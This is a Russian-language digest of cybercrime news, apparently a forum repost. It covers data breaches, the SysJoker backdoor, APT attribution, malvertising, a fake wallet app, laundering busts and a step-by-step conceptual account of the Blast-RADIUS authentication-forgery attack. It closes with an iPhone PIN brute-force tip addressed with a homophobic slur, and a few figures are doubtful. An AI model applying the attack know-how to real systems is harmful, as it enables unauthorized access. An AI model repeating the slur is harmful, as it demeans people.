— Как выяснилось, мужчина пытался взломать банкомат при помощи монтировки и кувалды. На место происшествия была вызвана следственно-оперативная группа полиции, — сообщили в пресс-службе ведомства.
Взломщика доставили в полицию для дальнейшего разбирательства. Как сообщает пресс-служба ГУ МВД России по Новосибирской области, по факту происшествия возбуждено уголовное дело по ст. 30, ч. 4 ст. 158 УК РФ («Покушение на кражу в особо крупном размере»).
У одной из самых популярных социальных сетей в мире произошла масштабная утечка — хакерам удалось украсть не только огромный массив данных объёмом почти в терабайт, но и исходный код, поскольку он практически никак не был защищён. Вдобавок были похищены и данные пользователей популярнейшего китайского мессенджера WeChat.

Впервые о взломе сообщил пользователь под ником AgainstTheWest на сайте Breach Forums. Хакерам удалось получить доступ к базе данных не только TikTok, но и WeChat, которые по непонятной причине хранились в одном месте. Более того, злоумышленники заполучили весь исходный код внутреннего бэкенда TikTok, который хранился в облаке Alibaba Cloud и был защищён не слишком надёжным паролем.
Указывается, что в общей сложности хакерами было украдено около 790 ГБ данных с информацией о 2,05 миллиарда учётных записей. Предполагается, что речь идёт о пользователей как TikTok, так и локальной китайской версии сервиса Douyin. Пока что сами хакеры и разные специалисты изучают все эти данные (часть которых была опубликована на Breach Forums), так что масштабы утечки до конца не определены.
[](https://ds- assets.cdn.devapps.ru/pJU32KmpBMz2Zz19lBwBg8z1nupz0QSe.png)
Сотрудник Microsoft и специалист по кибербезопасности Трой Хант взялся за расследование этого случая. По его словам, представленные доказательства пока выглядят не особо убедительно и некоторые данные, похоже, и без того были общедоступными, а часть из них он и вовсе считает «мусорными». Появились также предположения, что опубликованная информация могла быть получена не от TikTok, а от третьей стороны, интегрированной в социальную сеть в целях маркетинга или электронной коммерции.
source: breached.to/Thread-TikTok-WeChat-breach | twitter.com/troyhunt/status/1566565409939427328
Кибершпионы начали использовать в атаках новый кросс-платформенный бэкдор «SysJoker», который способен скомпрометировать не только Windows, но и Linux с macOS. Исследователи обнаружили вредонос в декабре 2021 года, когда злоумышленники активно атаковали Linux-сервер одного из образовательных учреждений.
По словам специалистов компании Intezer, SysJoker маскируется под обновления операционной системы и получает адрес командного сервера (C2), расшифровывая строку в текстовом файле, который хранится на Google Диске.
Сам бэкдор написан на C++, киберпреступники доставляют его на компьютеры жертв с помощью дроппера (с удалённого сервера). Попав в систему, SysJoker начинает собирать информацию: MAC-адрес, имя пользователя, серийный номер и IP-адрес. Всё это шифруется и передаётся на сервер злоумышленников.
Зловред подключается к C2-серверу, извлекая его URL из жёстко заданной в коде ссылки Google Drive. Для этого в облаке размещается файл «domain.txt», хранящий всю необходимую информацию.
Сервер отправляет бэкдору инструкции, позволяющие ему запускать на компьютере определённые команды и исполняемые файлы.
«Поскольку код SysJoker был написан с нуля и ранее не фигурировал в других кибератаках, можно предположить, что за этим бэкдором стоит хорошо подготовленная киберпреступная группировка, промышляющая целевыми атаками», — подчеркнули исследователи.
• Source: <https://www.intezer.com/blog/malware-analysis/new-backdoor- sysjoker/>
Власти Китая продолжают усиливать противодействие развитию отрасли криптовалют, по направлению майнинга и обменных операций. Правоохранительные органы начали отслеживать компании, нарушающие запрет Народного Банка на работу с криптобиржами и сервисами внебиржевого обмена цифровых активов.
Бюро уголовных расследований вчера провело аресты владельцев криптобизнеса в рамках пятого раунда спецоперации «Card Break», прошедшей одновременно на территории 23-х провинций КНР.
Правоохранители обвинили их в связи со взламывающими банковские карты хакерами и организаторами финансовых пирамид. По версии следствия, злоумышленники использовали криптовалюты для вывода украденных средств за рубеж, для операций по их отмыванию на биржах Гонконга.
По данным властей, аресты коснулись 1100 человек, закрыто 170 компаний, но пока неясно, сколько из них занимались непосредственно обменом криптовалют. Сделки злоумышленников проходили через биржи Binance, Huobi и OKEx, теперь они «забанены» Регуляторам КНР в китайском Интернете.
Блокировка на материке не может навредить бизнесу перечисленных компаний, которые в начале июня самостоятельно практически прекратили работы с проживающими на материке, гражданами Китая. Впрочем, Регулятор не ограничился биржами, блокировкам в соцсети Weibo подверглись все аккаунты со специализацией на теме криптовалют.
Последний шаг идет в разрез с официальной позицией властей, изложенной газетой
«Синьхуа» 3-го июня. Рупор Компартии особо отметил, что в стране нет прямого
запрета на криптовалюты.
Самый ощутимый удар по криптоидустрии, нанесли действия властей провинции
Синьзян, на которую приходится более 30% мировой добычи Bitcoin. Шахты
майнеров работают в зоне экономического развития Чжундун, пользуясь льготами и
дешевой электроэнергией угольных электростанций.
В отличие от Внутренней Монголии и Сычуань, которые не стали отказываться от легального майнинга, власти Синьзян постановили закрыть добычу Bitcoin. Решение никак не отразилось на хешрейте, который упал на 25% за месяц до этих событий. Видимо, китайские майнеры начали готовиться к исходу сразу, после наступления Народного Банка на внебиржевые сервисы.
Французские власти сообщили, что прекратили работу уже третьей за последние четыре года торговой площадки в даркнете, Le Monde Parallèle (фр. «Параллельный мир»).
Сайт работал с начала 2020 года, и теперь был отключен в результате операции, координируемой Национальным директоратом разведки и таможенных расследований Франции.
«Два администратора сайта были арестованы, и деятельность LMP прекращена», — гласит официальное сообщение правоохранителей.
Click to expand...
LMP представлял собой обычный дискуссионный форум, но также был и торговой площадкой для франкоговорящих преступных групп. По мнению следователей, злоумышленники использовали сайт для продажи ворованных банковских карт, наркотиков, поддельных документов и оружия.
Кроме того, сайт также служил форумом поддержки и тренировочной площадкой для преступных группировок, позволяя хакерам находить партнеров для различных преступных действий во Франции и странах Европы.
LMP приобрел известность в прошлом году после того, как французские власти закрыли два других маркетплейса для на франкоговорящих пользователей: Black Hand в 2018 году и French Deep Web Market в 2019 году .
Как и во всех предыдущих случаях, французские власти обещают изучить изъятые данные и позже предъявить дополнительные обвинения пользователям сайта.
Источник: xakep.ru/2021/05/27/le-monde-parallele-down/
Специалисты Google обнаружили атаки на исправленную в январе 2021 года уязвимость CVE-2020-11261, от которых пока пострадало небольшое количество пользователей.
Данная уязвимость связана с графическим компонентом Qualcomm и проявляется на Android-устройствах, использующих чипсеты Qualcomm. Известно, что баг может использоваться для провоцирования нарушения целостности информации в памяти, когда вредоносное приложение запрашивает доступ к большой части памяти устройства. При этом проблема может быть использована только локально. То есть злоумышленнику придется заранее внедрить на устройство вредоносный код (через другое приложение или физический доступ к смартфону).
Обычно подобные атаки требуют весьма сложных сценариев и не используются массово, но по крайней мере одному злоумышленнику уже удалось использовать CVE-2020-11261, о чем сообщают эксперты Google Project Zero.
Пока никаких подробностей об этих атаках, пострадавших и лицах, которые за ними стоят, не сообщается. Судя по всему, специалисты Google еще занимаются расследованием случившегося.
В январском отчете Qualcomm перечислены следующие уязвимые чипсеты. Владельцам таких устройств стоит подумать об обновлении, если они не получают исправления автоматически:
Code:Copy to clipboard
APQ8009W, APQ8017, APQ8053, AQT1000, AR8031, AR8035, CSR8811, CSRA6620, CSRA6640, FSM10055, FSM10056, IPQ6010, IPQ6018, IPQ6028, IPQ8074A, IPQ8076A, IPQ8174, MSM8909W, MSM8917, MSM8953, PM215, PM3003A, PM4125, PM439, PM456, PM6125, PM6150, PM6150A, PM6150L, PM6250, PM6350, PM640A, PM640L, PM640P, PM660, PM660A, PM660L, PM7150A, PM7150L, PM7250, PM7250B, PM7350C, PM8004, PM8005, PM8008, PM8009, PM8150, PM8150A, PM8150B, PM8150C, PM8150L, PM8250, PM8350, PM8350B, PM8350BH, PM8350BHS, PM8350C, PM855, PM855B, PM855L, PM855P, PM8909, PM8937, PM8953, PM8998, PMC1000H, PMD9655, PMI632, PMI8937, PMI8952, PMI8998, PMK7350, PMK8002, PMK8003, PMK8350, PMM6155AU, PMM8155AU, PMM855AU, PMP8074, PMR525, PMR735A, PMR735B, PMW3100, PMX50, PMX55, QAT3514, QAT3516, QAT3518, QAT3519, QAT3522, QAT3550, QAT3555, QAT5515, QAT5516, QAT5522, QAT5533, QAT5568, QBT1500, QBT2000, QCA4024, QCA6175A, QCA6310, QCA6335, QCA6390, QCA6391, QCA6420, QCA6421, QCA6426, QCA6430, QCA6431, QCA6436, QCA6564, QCA6564A, QCA6564AU, QCA6574, QCA6574A, QCA6574AU, QCA6584AU, QCA6595, QCA6595AU, QCA6696, QCA8072, QCA8075, QCA8081, QCA8337, QCC1110, QCN5021, QCN5022, QCN5024, QCN5052, QCN5054, QCN5124, QCN5154, QCN9000, QCN9022, QCN9024, QCN9074, QCS405, QCS410, QCS610, QDM2301, QDM2302, QDM2305, QDM2307, QDM2308, QDM2310, QDM3301, QDM3302, QDM4643, QDM4650, QDM5579, QDM5620, QDM5621, QDM5650, QDM5652, QDM5670, QDM5671, QDM5677, QDM5679, QET4100, QET4101, QET4200AQ, QET5100, QET5100M, QET6100, QET6110, QFE2101, QFE2520, QFE2550, QFE3340, QFE4301, QFE4302, QFE4303, QFE4305, QFE4308, QFE4309, QFE4320, QFE4373FC, QFS2530, QFS2580, QFS2608, QFS2630, QLN1020, QLN1021AQ, QLN1030, QLN1031, QLN1036AQ, QLN4640, QLN4642, QLN4650, QLN5020, QLN5030, QLN5040, QPA2625, QPA4340, QPA4360, QPA4361, QPA5373, QPA5461, QPA5580, QPA5581, QPA6560, QPA8673, QPA8675, QPA8686, QPA8801, QPA8802, QPA8803, QPA8821, QPA8842, QPM2630, QPM4621, QPM4630, QPM4640, QPM4641, QPM4650, QPM5541, QPM5577, QPM5579, QPM5620, QPM5621, QPM5641, QPM5657, QPM5658, QPM5670, QPM5677, QPM5679, QPM5870, QPM5875, QPM6325, QPM6375, QPM6582, QPM6585, QPM6621, QPM6670, QPM8820, QPM8830, QPM8870, QPM8895, QSM7250, QSM8250, QSW6310, QSW8573, QSW8574, QTC410S, QTC800H, QTC800S, QTC801S, QTM525, QTM527, Qualcomm215, RSW8577, SA515M, SA6145P, SA6155, SA6155P, SA8155, SA8155P, SD 675, SD 8C, SD 8CX, SD205, SD210, SD429, SD439, SD460, SD632, SD660, SD662, SD665, SD670, SD675, SD690 5G, SD710, SD720G, SD730, SD750G, SD765, SD765G, SD768G, SD845, SD855, SD865 5G, SD888 5G, SDA429W, SDR051, SDR052, SDR425, SDR660, SDR660G, SDR675, SDR735, SDR735G, SDR8150, SDR8250, SDR865, SDW3100, SDX50M, SDX55, SDX55M, SDXR1, SDXR2 5G, SM4125, SM4350, SM6250, SM6250P, SM7250P, SM7350, SMB1351, SMB1354, SMB1355, SMB1358, SMB1380, SMB1381, SMB1390, SMB1394, SMB1395, SMB1396, SMB1398, SMB2351, SMR525, SMR526, WCD9326, WCD9335, WCD9340, WCD9341, WCD9370, WCD9371, WCD9375, WCD9380, WCD9385, WCN3610, WCN3615, WCN3620, WCN3660B, WCN3680B, WCN3910, WCN3950, WCN3980, WCN3988, WCN3990, WCN3991, WCN3998, WCN3999, WCN6740, WCN6750, WCN6850, WCN6851, WCN6856, WGR7640, WSA8810, WSA8815, WSA8830, WSA8835, WTR2955, WTR2965, WTR3925, WTR4905, WTR5975, WTR6955.
Источник: xakep.ru/2021/03/23/android-bug-under-attack/
Киберполиция разоблачила организованную группу, которая изготавливала и сбывала поддельные водительские удостоверения. Фигуранты в интернете принимали заявки на изготовление удостоверений водителя европейского образца.
Об этом сообщает пресс-служба Министерства внутренних дел.
Указано, что заказчики без прохождения соответствующих экзаменов за 43 тысячи гривен получали поддельный документ. Ежегодный доход участников группы достигал около 20 миллионов гривен.
Открыто уголовное производство по ч. 3 ст. 190 (мошенничество), ч. 1 ст. 358 (подделка документов, печатей, штампов и бланков, сбыт или использование поддельных документов, печатей, штампов) Уголовного кодекса.
"Киберполиция установила, что организовал незаконный бизнес 29-летний житель Киева. Мужчина создал и администрировал вебсайты, где принимались заявки на изготовление удостоверений водителя европейского образца. Также фигурант образовал сall-центр, к работе в котором привлек около 20-ти работников", - указано в сообщении.
Операторы связывались с заказчиками и уверяли тех, что они якобы будут учиться в одной из автошкол Польши. А для "гарантированного" получения водительского удостоверения на государственный экзамен в сервисном центре должен был идти сотрудник компании вместо клиента.
"Фигуранты, используя поддельные печати, незаконно изготавливали удостоверения. Далее фейковый документ присылали заказчикам по почте, а деньги злоумышленники получали на банковские счета, открытые на подставных лиц", - информирует МВД.
По местам проживания фигурантов, а также в call-центре правоохранители провели обыски и изъяли компьютерную технику, мобильные телефоны, банковские карты, "черновые" записи, штампы, печати и непосредственно удостоверения европейского образца.
Решается вопрос об объявлении участникам группы о подозрении и избрании меры пресечения.
Следственные действия продолжаются.
Криминалисты ГКП Каунасского округа 26 мая задержали в гостинице в центре Каунаса двоих граждан Дании, которых подозревают в том, что они "отоварились" в Вильнюсе и Каунасе больше чем на 200 000 евро.
В ходе расследования и при сотрудничестве с ЗАО Wordline Lietuva были выявлены лица, которых подозревают в использовании чужих платежных карт и телефонов. Подозревают, что за три дня были инициированы незаконные оплаты товаров в магазинах Каунаса и Вильнюса с помощью банковских данных выданных за границей платежных карт.
В среду в Каунасе были задержаны мужчина (1984 г.р.) и женщина (1974 г.р.), у которых нашли и изъяли часть приобретенных товаров – электронное оборудование (телефоны, "умные" часы), ювелирные изделия, одежда и т.д. Средняя стоимость одной покупки составляла 5000 евро, сообщает полиция.
Начато расследование.
Издание The Record обратило внимание, что индонезийское правительство заблокировало доступ к известному хакерскому форуму RAID, пытаясь предотвратить распространение конфиденциальных данных жителей страны.
Дело в том, что 12 мая 2021 года на форуме появилось объявление о продаже личных данных 279 миллионов индонезийцев. В качестве доказательства продавец этого дампа, известный как Kotz, опубликовал образец, содержащий информацию о миллионе граждан.
Утечка включает имена, национальные удостоверения личности, информацию о налоговой регистрации, номера мобильных телефонов, а для некоторых граждан также предоставлены фотографии и информация о зарплате.
__https://twitter.com/x/status/1395232625233514496
Хотя считается, что утечка содержит устаревшую информацию, а также данные об умерших (279 миллионов человек — больше, чем текущее население Индонезии, начитывающее 273 миллиона граждан), индонезийские СМИ сочли данные достоверными. В конечном итоге подлинность утечки [подтвердили](https://www.kominfo.go.id/content/detail/34645/siaran-pers- no-181hmkominfo052021-tentang-update-terkait-dugaan-kebocoran-data-pribadi- penduduk-indonesia/0/siaran_pers) и власти Индонезии, заявив, что Национальное агентство по кибербезопасности и криптографии (BSSN), а также Администрация социального обеспечения и здравоохранения (BPJS) начали совместное расследование инцидента. Причем предполагается, что информация могла утечь именно у BPJS, но это еще не подтверждено.
Правительство страны также приказало интернет-провайдерам заблокировать доступ к форуму RAID и URL-адресам bayfiles.com, mega.nz и anonfiles.com, где были размещены образцы похищенных данных. Эту блокировку уже успели осмеять в сети, так как черный список основан на DNS, и блокировку можно обойти с помощью прокси или VPN.
Сообщается, что объявление о продаже данных уже было удалено с форума, вскоре после запрета правительства. Неясно, удалил ли тему сам Kotz, или это сделали администраторы форума.
Источник: xakep.ru/2021/05/25/indonesian-raid-block/
Японские правоохранители полагают, что хак-группа, связанная с китайскими военным, стоит за масштабной кибершпионской кампанией, в ходе контрой с 2016 года были взломаны более 200 японских компаний и организаций.
Различные информационные агентства страны, включая Yomiuri Shimbun, Nikkei, NHK и The Mainichi, заявили, что подозреваемые использовали поддельные удостоверения личности для регистрации веб-серверов в период с 2016 по 2017 год. Ссылаясь на собственные источники, СМИ пишут, что полиция Токио вышла на 30-летнего гражданина Китая, студента, который помогал хакерам в этих атаках. Также сообщается, что двое подозреваемых уже покинули Японию после допросов, но официальные лица планируют передать дело в прокуратуру и добиваться их официального ареста.
Упомянутые выше серверы впоследствии использовались китайской хакерской группой, известной под названием Tick, для атак на японские компании и исследовательские институты, работающие в областях авиации и национальной обороны. При этом единственный известный пострадавший, которого сумели выявить японские следователи, это Японское агентство аэрокосмических исследований (JAXA).
Интересно, что это первый случай, когда кто-то связал группу Tick с китайскими военными. Так, японские СМИ пишут, что хакеры выполняли приказ отряда 61419 Народно-освободительной армии Китая, действовавшего из китайского города Циндао в провинции Шаньдун.
Аналитики компании Recorded Future отмечают, что информация о связи с конкретным подразделением НОАК, скорее всего, основывается на старых данных о китайской военной разведке, собранных еще в середине 2010-х годов, до недавних военных реформ и реструктуризаций, произошедших в стране. Но хотя атрибуция с конкретным отрядом НОАК может быть неверна, в целом исследователи говорят, что группа Tick уже некоторое время подозревается в том, что "работает" на китайские вооруженные силы.
Источник: xakep.ru/2021/04/21/tick-apt/
Эксперты компании Confiant сообщают, что обнаруженная ими в прошлом году вредоносная кампания Tag Barnakle по-прежнему активна, и злоумышленники не сбавляют обороты.
Напомню, что с августа 2019 года некая хакерская группа взламывает рекламные серверы, чтобы внедрять свои вредоносные объявления на самые разные сайты. В итоге посетителей таких ресурсов перенаправляют на сайты с загрузкой малвари, мошеннические ресурсы и так далее. В прошлом году сообщалось, что специалисты обнаружили взлом 60 рекламных серверов.
В прошлогоднем отчете исследователи писали, что хакеры атакуют рекламные сети, использующие старые версии опенсорсного рекламного сервера Revive. Если атака удалась, они добавляют свой вредоносный код к существующей рекламе. Когда такие зараженные объявления загружаются на различные сайты, а вредоносный код перехватывает и перенаправляет их посетителей на вредоносные ресурсы.
Как это ни удивительно, за прошедшее время тактика хакеров практически не изменилась: они все еще атакуют незащищенные и уязвимые серверы Revive, используя для этого известные эксплоиты и старые уязвимости. Правда теперь злоумышленники скомпрометировали уже свыше 120 рекламных серверов, больше нацелены на пользователей мобильных устройств и перенаправляют их на сайты мошенников, торгующих сомнительными продуктами.
[](https://xakep.ru/wp- content/uploads/2021/04/346332/TagBarnacle-MO.jpeg)
Схема атаки
«Большинство таких кампаний заманивают жертв в магазины приложений, в раздел с подозрительными продуктами для безопасности, защиты, VPN, которые имеют скрытую стоимость подписки или используют трафик для вредоносных целей», — говорят специалисты.
Click to expand...
[](https://xakep.ru/wp- content/uploads/2021/04/346332/TagBarnacle-scamss.png)
По словам экспертов, владельцы скомпрометированных рекламных ресурсов также используют RTB для трансляции своей рекламы другим рекламным компаниям, что делает атаки Tag Barnakle еще более масштабными. По самым скромным оценкам, к текущему моменту пострадать от деятельности хакеров могли десятки или даже сотни миллионов пользователей.
Более того, исследователи говорят, что в прошлом году Confiant уведомила владельцев 60 взломанных серверов о проблемах, однако ответ ни от одной из компаний так и не был получен.
Источник: xakep.ru/2021/04/20/tag-barnakle/
Пользователи лишились как минимум $1,6 млн из-за мошеннического сервиса, маскирующегося под приложение аппаратного кошелька Trezor, сообщает The Washington Post.
Один из пострадавших Филипп Кристодулу [Phillipe Christodoulou] нашел приложение в App Store по названию «Trezor». После того, как он ввел свои данные для проверки баланса, все его биткоины похитили. Кристодулу лишился 17,1 ВТС. На тот момент они оценивались в $600 000, на момент написания — почти в $990 000.
В разговоре с The Washington Post потерпевший заявил, что больше злится на Apple, чем на мошенников, поскольку компания не проверила приложение.
В Apple пояснили, что часто разработчики мошеннических приложений отправляют изначально «безобидные» сервисы на проверку, а затем превращают их в фишинговые.
В компании рассказали, что фейковое приложение Trezor попало в App Store обманным путем и изначально позиционировалось как «криптографический» сервис для шифрования файлов и хранения паролей, не связанный с криптовалютами.
Специалисты компании Coinfirm утверждают, что Кристодулу — один из нескольких пострадавших. По данным Coinfirm, как минимум пять человек стали жертвами операторов фейкового Trezor для iOS. Общий ущерб составил $1,6 млн.
По данным компании Sensor Tower, приложение было доступно в App Store по крайней мере с 22 января по 3 февраля и могло быть загружено около 1000 раз.
Apple не раскрыла разработчиков этого приложения, не сообщила, передавала ли она сведения правоохранителям или проводила ли дальнейшее расследование в отношении разработчиков.
В Trezor заявили, что компания уже много лет уведомляет Apple и Google о поддельных приложениях, выдаваемых за продукт компании.
На днях Trezor обнаружила еще одно подобное приложение в Google Play.
Warning for all Android users!
There is a scam app on Google Play Store impersonating Trezor.
We've already reported it and ask you not to install it on your device!Stay safe and never share your seed with anyone until your Trezor device asks you to. pic.twitter.com/g0ofekDnzs
— Trezor (@Trezor) March 29, 2021Click to expand...
Напомним, злоумышленники часто используют имя Trezor. В 2018 году компания обнаружила фейковые устройства Trezor One, созданные и распространяемые неизвестными.
В начале 2021 года представители Trezor предупредили пользователей Android- устройств о фейковом приложении Mobile Manager Wallet, распространяющемся в Google Play.
Бразильская федеральная полиция разоблачила операцию по отмыванию денег из криминальных источников с использованием криптовалют, отправляя их за границу. Операция Niflheim включала выдачу восьми ордеров на арест и 19 ордеров на обыск и изъятие против этих групп, действовавших в Кашиас-ду-Сул, Сан-Паулу, Форталезе и Бразилиа. Преступники отмыли более 9 миллиардов долларов с 2021 года.
Бразильские власти разоблачили крупные преступные организации по отмыванию
денег с использованием криптовалют
Бразильская федеральная полиция организовала операцию по разоблачению трех
организаций, связанных с операциями по отмыванию денег с использованием
криптовалют. Операция, получившая название Niflheim, была проведена в
сотрудничестве с Федеральной налоговой службой, налоговым регулятором
Бразилии, и включала выдачу восьми ордеров на арест и 19 ордеров на обыск и
изъятие в Кашиас-ду-Сул, Сан-Паулу, Форталезе и Бразилиа.
Федеральный суд Бразилии также заморозил 1,58 миллиарда долларов на счетах в банках и криптовалютных биржах. Также были изъяты несколько автомобилей и недвижимость.
Операция была направлена на ликвидацию трех организаций, которые совместно отмыли 9,7 миллиарда долларов с помощью криптовалют с момента начала расследования в 2021 году. Местные СМИ сообщили, что отмытые средства были продуктом различных незаконных действий, главным образом торговли наркотиками и контрабанды.
Группы использовали подставные компании и другие средства, чтобы скрыть свои операции и происхождение полученных средств. После отмывания деньги отправлялись за границу в такие страны, как США, Объединенные Арабские Эмираты (ОАЭ), Гонконг и Китай.
Объясняя весь спектр преступлений, которые предположительно совершали эти организации, федеральная полиция заявила:
Исследуемые преступления включают отмывание денег либо сокрытие активов, преступления против национальной финансовой системы, идейный подлог, преступные сговоры, криминальные организации и преступления против налоговой системы.
Хотя расследования указывают на то, что эти группы действовали индивидуально, они имели высокий уровень сотрудничества в своих действиях, до такой степени, что полиция считает, что это может быть одна организация, с ее лидерами, проживающими в Кашиас-ду-Сул и Орландо.
valor.globo.com/financas/criptomoedas/noticia/2024/09/10/pf-deflagra-operao- contra-cripto-criminosos-que-teriam-movimentado-mais-de-r-55-bilhes.ghtml
Нигериец в Гане крытым за шевронами сидит. Он по имейлам шарахал благотворительные фирмы в США, зацепил их на $7 500 000!
Олусегун Самсон Адежорин (чего бл#ть) под домашним арестом с 29-го декабря. Ему на воровство вменяют, что он хакал почтовые ящики и взламывал компы.
Минюст США говорит, что он тащил спектакль с июня по август 2020 года. Выдавался за боссов благотворительных фирм, отсылал имейлы, что типа подтверждают крупные транзакции.
Теперь у него весело: 34 года максимум выйдет.
sx: justice[.]gov/usao-md/pr/nigerian-national-arrested-ghana-facing-federal- charges-alleged-75-million-business
Группа исследователей из нескольких американских университетов и компаний Cloudflare и Microsoft разработала новую технику атаки на протокол RADIUS, применяемый операторами связи, облачными сервисами и VPN-провайдерами для аутентификации, авторизации и аккаунтинга пользователей. Атака, которая получила кодовое имя Blast-RADIUS, даёт возможность подделать ответ RADIUS-сервера при прохождении аутентификации и организовать подключение абонента без знания пароля доступа.
Для эксплуатации уязвимости (CVE-2024-3596) атакующий должен иметь возможность перехвата транзитного трафика и проведения полноценной MITM-атаки, позволяющей читать, перехватывать, блокировать и изменять входящие и исходящие транзитные UDP-пакеты, отправляемые точками доступа для запроса аутентификации клиентов (Access-Request) и возвращаемые RADIUS-сервером с подтверждением или отклонением операции. Перехватив запрос аутентификации атакующий может направить фиктивный ответ, указав в этом ответе иной тип результата (например, Access-Accept вместо Access-Reject). Атакующий также потенциально может перехватить ответ Access-Challenge, используемый при двухфакторной аутентификации, и заменить его на ответ Access-Accept для обхода прохождения дополнительного этапа проверки.
Атака основана на том, что протокол RADIUS использует в качестве транспорта UDP и верифицирует целостность передаваемых сообщений при помощи алгоритма MD5. Для верификации сообщений, передаваемых между сервером доступа и RADIUS- сервером, применяется секретный ключ, известный точке доступа и RADIUS- серверу, но неизвестный атакующему. В ответ на запрос аутентификации RADIUS- сервер генерирует MD5-хэш, при помощи которого сервер доступа может удостовериться, что сообщение отправлено авторизированным сервером. MD5-хэш охватывает присланное в запросе случайное значение, идентификатор запроса, возвращаемые атрибуты и секретный ключ.
Атакующий в ходе MITM-атаки может перехватить переданный в запросе идентификатор и случайное значение, а также может предсказать код операции, размер и атрибуты. Задача сводится к формированию корректного проверочного хэша, который бы соответствовал изменённому результату операции и проходил проверку через хэширование с использованием секретного ключа. Алгоритм MD5 не является стойким к подбору коллизий, что позволяет атакующему, манипулируя с не имеющим значения добавочным заполнением, подобрать сочетание данных с нужными параметрами, MD5-хэш которого будет совпадать с MD5-хэшем исходного ответа, и отправить фиктивный ответ с кодом успешного прохождения аутентификации (Access-Accept) вместо сообщения с информацией об ошибке.
Так как при обработке пакетов с запросом доступа (Access-Request) не применяется аутентификация и проверка целостности, в ходе атаки в исходный запрос от сервера доступа атакующий может подставить дополнительный атрибут "Proxy-State", который будет отражён RADIUS-сервером в своём ответе. Содержимое "Proxy-State" подбирается с учётом коллизии так, что значение проверочного MD5-хэша в реальном и поддельном ответах будут идентичны. При проведении эксперимента поиск коллизии в MD5 для совершения атаки занял 3-6 минут, что больше чем типовой таймаут в 30-60 секунд, но время поиска коллизии может быть сокращено за счёт использования более мощного оборудования, привлечения GPU и распараллеливания операций.
В качестве основной меры для защиты от уязвимости предлагается задействовать протокол EAP (Extensible Authentication Protocol, RFC 3579), в котором для дополнительной верификации сообщений используется атрибут Message- Authenticator. Для защиты от атаки также можно использовать расширения протокола (RadSec), включающие передачу RADIUS-сообщений через шифрованные каналы на базе TLS или DTLS. Кроме того, можно сократить до минимума значения таймаутов получения ответа и заблокировать ответы с атрибутом Proxy-State. Передача RADIUS-сообщений поверх TCP усложняет атаку, но не исключает её проведение.
Код для проведения атаки пока не опубликован в открытом доступе, но проекту hashclash переданы изменения, улучшающие подбор коллизий в MD5 с учётом специфики атаки. В RADIUS-сервере FreeRADIUS проблема устранена в выпусках 3.0.27 и 3.2.5 через включение обязательного применения атрибута Message-Authenticator и добавление настройки для ограничения обработки пакетов с атрибутом Proxy-State.
Аналитический центр компании StormWall внимательно изучил DDoS-атаки на российские компании, которые произошли во 2 квартале 2024 года. Специалисты выявили, что мае этого года наблюдался всплеск DDoS-атак на сервис- провайдеров, при этом DDoS-атаки на эти компании продолжаются до сих пор.
В мае этого года злоумышленники организовали массовые атаки на интернет и облачных провайдеров, при этом эффективность данных киберинцидентов составила 42%. В результате атак злоумышленников онлайн-ресурсы многих сервис- провайдеров были недоступны в течение длительного времени. Эффективность DDoS- атак на сервис-провайдеров в мае оказалась в 2 раза выше, чем эффективность атак на компании из разных отраслей в апреле.
Специалисты StormWall изучили особенности DDoS-атак на сервис-провайдеров и выявили, что хакеры использовали тактику “ковровых бомбардировок”, которые в последнее время стали одним из главных инструментов злоумышленников. “Ковровые бомбардировки” - это термин, который обозначает DDoS-атаки, нацеленные сразу на диапазон адресов или подсетей, которые могут содержать сотни или даже тысячи IP-адресов назначения. Данный метод отлично подходит для запуска атак на сервис-провайдеров. Средняя мощность атак составила 80-90 Гбит/с, а максимальная мощность достигала 830 Гбит/с.
На 20-летнего хакера из Бердска Новосибирской области завели уголовное дело за попытку атаковать сайт Правительства Российской Федерации. Сделать он это пытался с собственного ноутбука, пишет КП.
Как рассказали в УФСБ, молодой человек через вредоносную программу решил изучить уязвимость правительственного сайта. В отношении студента возбуждено уголовное дело.
Согласно статье 273 УК РФ «Создание, использование и распространение вредоносных компьютерных программ», юноше грозит до 4 лет лишения свободы и штраф до 200 тысяч рублей.
Как тебе такое, Илон Маск)))))
Россия запускает свой собственный проект спутникового интернета. Компания “Бюро 1440”, входящая в состав “ИКС-холдинга”, успешно вывела на низкую орбиту три спутника связи, которые будут обеспечивать широкополосный доступ к сети. По планам, к 2027 году сервис станет коммерческим и будет доступен не только в России, но и в других странах. Об этом сообщило Минцифры.
Спутники разработаны полностью на российских технологиях и имеют высокую
скорость передачи данных и низкую задержку. По словам Минцифры, уже сейчас
можно смотреть видео в HD-качестве, а в будущем скорость будет увеличена до
100 Мбит/с и выше. Для реализации проекта планируется запустить более 900
спутников к 2035 году, которые будут запускаться по 10-12 штук за раз на
ракетах “Союз-2”.
Сообщается, что текущая скорость передачи данных на устройство достигает 12
Мбит/сек, а время, требующееся для передачи данных от сервера до пользователя,
равно 41 миллисекунде.
Министр цифрового развития Максут Шадаев похвалил команду “Бюро 1440” за их профессионализм, амбиции и драйв. Он выразил уверенность, что они справятся со всеми техническими задачами и пожелал им успеха в реализации проекта. Он также отметил, что спутниковый интернет является одним из направлений развития цифровой инфраструктуры России, наряду с 5G и оптоволокном.
Кроме проекта “Бюро 1440”, в мире существуют и другие подобные проекты, которые также стремятся создать глобальную сеть спутникового интернета. Самым известным из них является Starlink компании SpaceX Илона Маска, который уже запустил на орбиту более 20000-спутников и начал предоставлять услуги в некоторых странах. Еще один проект — OneWeb британского предпринимателя Грега Уайлера, который запустил около 300 спутников, но столкнулся с финансовыми и юридическими проблемами. Также есть проект O3b компании SES, который использует спутники на средней орбите для обеспечения интернет-доступа в отдаленных регионах. Все эти проекты имеют свои особенности, преимущества и недостатки, и конкурируют между собой за рынок спутникового интернета.
Спутниковый интернет на низкой орбите - это вид интернет-связи, который использует спутники, находящиеся на высоте от 160 до 2000 км над Землей, для передачи данных между пользователем и провайдером. Основное преимущество такого интернета - это меньшая задержка сигнала, чем у спутников на геостационарной орбите (36 тыс. км), которая составляет около 30 мс. Это позволяет обеспечить более высокую скорость и качество связи, особенно для регионов с плохим или отсутствующим интернет-покрытием. Однако для создания глобальной сети спутникового интернета на низкой орбите требуется запустить тысячи спутников, которые должны быть синхронизированы и управляемы. Кроме того, такие спутники подвержены воздействию атмосферы и космического мусора, что может привести к их снижению или повреждению.\
securitylab.ru/news/
#НаЗлобуДня
Содомитам использующим айфоны на заметку:
Если айфон включен и в него один раз вводили пинкод то он поддается перебору,
а если ни разу после включения не вводился - то там медленный режим перебора и
стандартный 6 знак будут брутить 19 лет.
